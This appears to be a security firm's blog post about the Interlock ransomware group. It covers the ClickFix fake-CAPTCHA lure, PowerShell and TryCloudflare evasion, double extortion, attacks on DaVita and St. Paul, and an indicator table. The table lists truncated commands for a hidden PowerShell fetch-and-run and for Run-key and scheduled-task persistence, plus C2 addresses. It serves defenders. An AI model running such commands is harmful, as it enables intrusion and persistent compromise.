Interlock Ransomware: How This Deceptive Cyber Threat Works

The Interlock ransomware group is a major cyber threat that uses social engineering and double extortion to target critical sectors. Understand their "ClickFix" attack method and how to protect your organization from this sophisticated malware.
Facebook Twitter Youtube
Written by Heloise Montini
Written by Heloise Montini
Edited by Laura Pompeu
Edited by Laura Pompeu
Approved by Bogdan Glushko
Approved by Bogdan Glushko

Key takeaways:

  • Interlock ransowmare uses social engineering to trick IT professionals into running malicious code themselves. 
  • They hide their activity using legitimate system tools like PowerShell and Cloudflare. This “living-off-the-land” approach makes detection extremely difficult.
  • The ransomware steals data before encrypting it, creating double leverage.

First emerging in September 2024, Interlock ransomware targets critical infrastructure and employs clever psychological tactics to bypass traditional defenses. Unlike typical ransomware, Interlock operates as a closed group, orchestrating high-impact attacks that have crippled healthcare providers and even forced a state government to mobilize its National Guard.

Interlock ransomware overview

Interlock is a financially motivated ransomware group known for its double extortion strategy. This two-pronged attack involves first stealing sensitive data (exfiltration) and then encrypting the victim’s files to render them inaccessible. The group operates without external affiliates, suggesting a tight-knit and skilled team.

Interlock shows a preference for critical sectors where disruption causes maximum pressure, including healthcare, government, education, and technology across North America and Europe.

Interlock ransomware impact and consequences

In April 2025, the group attacked the kidney dialysis provider DaVita, resulting in the theft of 1.5 terabytes of data affecting over 200,000 patients. 

An even more alarming event occurred in July 2025, when Interlock launched a cyberattack against the City of St. Paul, Minnesota. The attack was so severe that it overwhelmed the city’s internal and commercial response capabilities. This prompted Minnesota Governor Tim Walz to issue Emergency Executive Order 25-08, a drastic measure that authorized the Minnesota National Guard to provide cyber protection support.

What are Interlock ransomware attack methods

Interlock’s success lies in its sophisticated and deceptive tactics, which often turn an organization’s own employees and trusted tools against it.

Stage of Attack Technique Used Step-by-Step Description of Attacker's Actions
1. Initial Access "ClickFix" Social Engineering
  • Attackers create a fake website impersonating a legitimate software tool (e.g., "Advanced IP Scanner").
  • The site displays a deceptive error message or CAPTCHA, often mimicking a trusted service like Cloudflare.
  • A user is instructed to "fix" the issue by following simple keyboard commands (Win+R, Ctrl+V, Enter).
  • Clicking a button on the page secretly copies a malicious PowerShell command to the user's clipboard.
  • The user unknowingly executes this command, giving the attacker initial access to the system.
2. Execution & Persistence Backdoor Installation
  • The initial PowerShell script runs silently, acting as a backdoor.
  • It begins collecting system information and communicates with the attacker's server.
  • To ensure it can survive a reboot, the script creates new Windows registry keys, establishing persistence on the compromised machine.
3. Defense Evasion Living-off-the-Land
  • Attackers use legitimate tools already present on the system, primarily PowerShell, to run commands and avoid detection.
  • They abuse trusted services like Cloudflare's "TryCloudflare" to tunnel their command-and-control (C2) traffic, making it appear as legitimate network activity.
4. Lateral Movement Credential Theft & RDP
  • Once inside, the attackers use tools to find and steal user credentials.
  • They use these stolen credentials with the Remote Desktop Protocol (RDP) to move across the network to other computers.
  • The ultimate goal is to gain administrative access, often by compromising the network's domain controller.
5. Data Exfiltration Pre-Encryption Data Theft
  • Before encrypting any files, the attackers identify and steal large volumes of sensitive data.
  • This data is uploaded to attacker-controlled cloud storage, such as an Azure Blob Storage account.
  • This step secures the "second" part of their extortion strategy before the victim is even aware of the breach.
6. Impact Double Extortion
  • File Encryption: The ransomware payload is deployed across the network. All targeted files are encrypted and appended with the .interlock extension, making them unusable.
  • Ransom & Threat: A ransom note is left on the system. The attackers demand payment not only for the decryption key but also threaten to publicly release the stolen data on their "Worldwide Secrets Blog" if the demand is not met.

The "ClickFix" technique

Interlock’s primary weapon for initial access isn’t a software exploit but a brilliant piece of social engineering called “ClickFix.” The attack often targets IT professionals, the very people tasked with security.

Here’s how it works:

  1. An attacker creates a fake website that perfectly mimics a legitimate download page for a popular tool, such as “Advanced IP Scanner.”
  2. The site displays a fake CAPTCHA or error message designed to look like a trusted service like Cloudflare. It instructs the user to “fix” a supposed issue.
  3. The user is told to press a simple key combination: Win + R to open the Run dialog, Ctrl + V to paste, and Enter to execute. The user doesn’t know that clicking the “Fix it” button has already copied a malicious PowerShell command to their clipboard.
  4. By following the instructions, the expert unknowingly pastes and runs the attacker’s code, granting Interlock its initial foothold in the network.

Living-off-the-land technique

Once inside, Interlock excels at evasion by using legitimate tools, a technique known as “living-off-the-land.” They use PowerShell, a scripting tool built into Windows, to execute commands, making their activity difficult to distinguish from normal administrative tasks. 

More insidiously, they abuse Cloudflare’s “TryCloudflare” tunneling tool to hide their command-and-control (C2) communications, effectively wrapping their malicious traffic in a legitimate service to become a ghost in the machine.

What the Interlock ransom note says

The Interlock group attempts to frame its extortion as a form of vigilante justice. In their ransom notes and on their dark web leak site, the “Worldwide Secrets Blog,” they present a strange manifesto:

We don’t just want payment; we want accountability. Our actions send a message to those who hide behind weak defenses… If you don’t take data security seriously, we will on your behalf. Pay attention or pay the price.

As John Riggi, national advisor for cybersecurity for the American Hospital Association (AHA), notes, Interlock has been “directly implicated in high impact ransomware attacks against hospitals and health systems, resulting in the disruption to care delivery and creating a risk to patient and community safety.”

Interlock Ransomware: Indicators of Compromise (IOCs)

Malware Hashes
Name Hash Type File Hash Details
dodgy.jsSHA-2562acaa9856ee58537c06cc2858fd71b860f53219504e6756faa3812019b5df5a6
12341234SHA-2567501623230eef2f6125dcf5b5d867991bdf333d878706d77c1690b632195c3ffClickFix PowerShell Loader
(multiple)SHA-2563e4407dfd827714a66e25c2baccefd915233eeec8fb093257e458f4153778beeInterlock RAT
budgetSHA-25661d092e5c7c8200377a8bd9c10288c2766186a11153dcaa04ae9d1200db7b1c5Interlock RAT
chst.shSHA-16b4bdffdd5734842120e1772d1c81ee7bd99c2f1ESXi Interlock Ransomware Script
conhostSHA-19256cc0ec4607becf8e72d6d416bf9e6da0e03ddESXi Interlock Ransomware Script
conhost.exeSHA-1bd19b3ccfb5220b53acff5474a7f63b95775a2c7Interlock Ransomware
complexionSHA-2566b72706fe0a0d2192d578e9e754d0e3f5715154a41bd18f80b32adcffad26522Interlock RAT
Network Artifacts (Domains & IPs)
Network Artifact Details Intrusion Phase
168.119.96[.]41Backdoor C2Command and Control
95.217.22[.]175Backdoor C2Command and Control
Cluders[.]orgSuspicious domainInitial Access
Bronxy[.]ccSuspicious domainInitial Access
fake-domain-1892572220[.]comSuspicious domain / C2Initial Access / C2
Basiclock[.]ccSuspicious domainInitial Access
Dijoin[.]orgSuspicious domainInitial Access
Playiro[.]netSuspicious domainInitial Access
Doriot[.]infoSuspicious domainInitial Access
Kingrouder[.]techSuspicious domainInitial Access
Dashes[.]ccPayload ServerInitial Access
Nettixx[.]comCompromised WordPress SiteInitial Access
159.69.3[.]151C2Command and Control
128.140.120[.]188C2Command and Control
177.136.225[.]135C2Command and Control
System Artifacts (Commands & Registry Keys)
Host Artifact Details
PowerShell.exe -w h -c “iex $(irm ...) Example of malicious PowerShell execution for initial download.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ... Registry Key used to establish persistence for malware like "ChromeUpdater".
schtasks /create /sc DAILY /tn “TaskSystem” ... Scheduled Task created for persistence, running a command daily.
C:\Users\...\AppData\Roaming\node-v22.11.0-win-x64\node[.]exe Example file path for a malicious executable.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v 0neDrive /t REG_SZ /d Another example of a registry Run Key used for persistence.

How to respond to an attack like the Interlock ransomware

Even with strong defenses, a determined adversary like Interlock can find a way through. The actions taken in the first few hours after a cyberattack can determine whether you face a contained issue or a catastrophic business disruption.

This is precisely why a professional incident response team is essential. Proven Data’s experts are equipped to immediately contain the threat, conduct deep forensic analysis to understand the full scope of the breach, and methodically eradicate the attacker from your network. We handle the entire process, from initial containment to full recovery, ensuring your business can return to normal operations safely and efficiently.

For organizations committed to the highest level of preparedness, an Incident Response Retainer offers the ultimate peace of mind. This proactive partnership places our elite team on standby for you 24/7/365. With a retainer in place, we are already familiar with your environment, allowing us to slash response times, minimize operational downtime, and significantly reduce the financial and reputational damage of an attack.

Heloise Montini
Writer

Heloise Montini is a content writer who leverages her journalism background and interests in PC gaming and creative writing to make complex topics relatable. Since 2020, she has been researching and writing insightful tech articles on data recovery, storage, and cybersecurity.

Laura Pompeu​
Editor

Laura Pompeu is a content editor and strategy leader at Proven Data, bringing over 10 years of digital media experience. Leveraging her background in journalism, SEO, and marketing, Laura shapes cybersecurity and technology content to be insightful yet accessible.

Bogdan Glushko
Administrator

As CEO of Proven Data, Bogdan lends 20 years of data recovery expertise as an editorial advisor. His real-world experience restoring systems for thousands guides Proven Data’s educational articles with insider insights on ransomware response, resilient data strategies, and evolving cyber threats.

What do you think?

Read more

Related Articles

Contact us

Leading experts on stand-by 24/7/365

If you suspect data loss or network breach, or are looking for ways to compile digital evidence through forensics and eDiscovery services – our team can help.

Call us at: 1 (877) 364-5161 for immediate assistance

What we offer:

  • Free consultation
  • Dedicated case manager
  • Online portal access
  • Our team works 24/7/365
  • Industry leading experts
  • Transparent pricing

What happens next?

1

 Our expert advisor will contact you to schedule your free consultation.

2

You’ll receive a customized proposal or quote for approval.

3

Our specialized team immediately jumps into action, as time is critical.

Request a Free Consultation